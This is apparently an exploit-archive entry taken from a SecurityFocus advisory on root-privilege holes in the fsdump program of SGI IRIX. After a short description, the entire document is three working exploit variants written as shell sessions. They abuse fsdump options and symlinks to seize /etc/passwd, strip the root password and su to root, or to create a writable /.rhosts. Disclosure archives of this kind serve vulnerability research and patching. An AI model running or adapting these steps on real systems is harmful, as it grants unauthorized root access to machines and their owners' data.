37 lines
No EOL
1.1 KiB
Text
37 lines
No EOL
1.1 KiB
Text
source: https://www.securityfocus.com/bid/355/info
|
|
|
|
A number of vulnerabilities exist in the fsdump program included with Silicon Graphics Inc's IRIX operating system. Each of these holes can be used to obtain root privlilege.
|
|
|
|
Variant 1:
|
|
irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /
|
|
(count to three, and hit ctrl-c)
|
|
irix% ls -la /etc/passwd
|
|
-rw-r--r-- 1 csh users 956 Feb 25 06:23 /etc/passwd
|
|
irix% tail -8 /etc/passwd
|
|
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
|
|
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
|
|
nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null
|
|
|
|
Tue Feb 25 06:23:48 PST 1997
|
|
Number of inodes total 208740; allocated 31259
|
|
Collecting garbage.
|
|
interrupted
|
|
irix% vi /etc/passwd # remove the encrypted root password
|
|
irix% chgrp sys /etc/passwd
|
|
irix% chown root /etc/passwd
|
|
irix% su -
|
|
irix#
|
|
|
|
Variant 2:
|
|
|
|
cp /etc/passwd /tmp/passwd
|
|
ln -s /etc/passwd rfd.lock
|
|
/var/rfindd/fsdump -F/tmp/rfd /
|
|
/var/rfindd/fsdump -L/etc/passwd -F/tmp/rfd /
|
|
|
|
Variant 3:
|
|
cd /tmp
|
|
ln -s /.rhosts fsdump.dir
|
|
/var/rfindd/fsdump -Fgimme /
|
|
ls -al /.rhosts
|
|
rm -f fsdump.dir fsdump.pag gimme |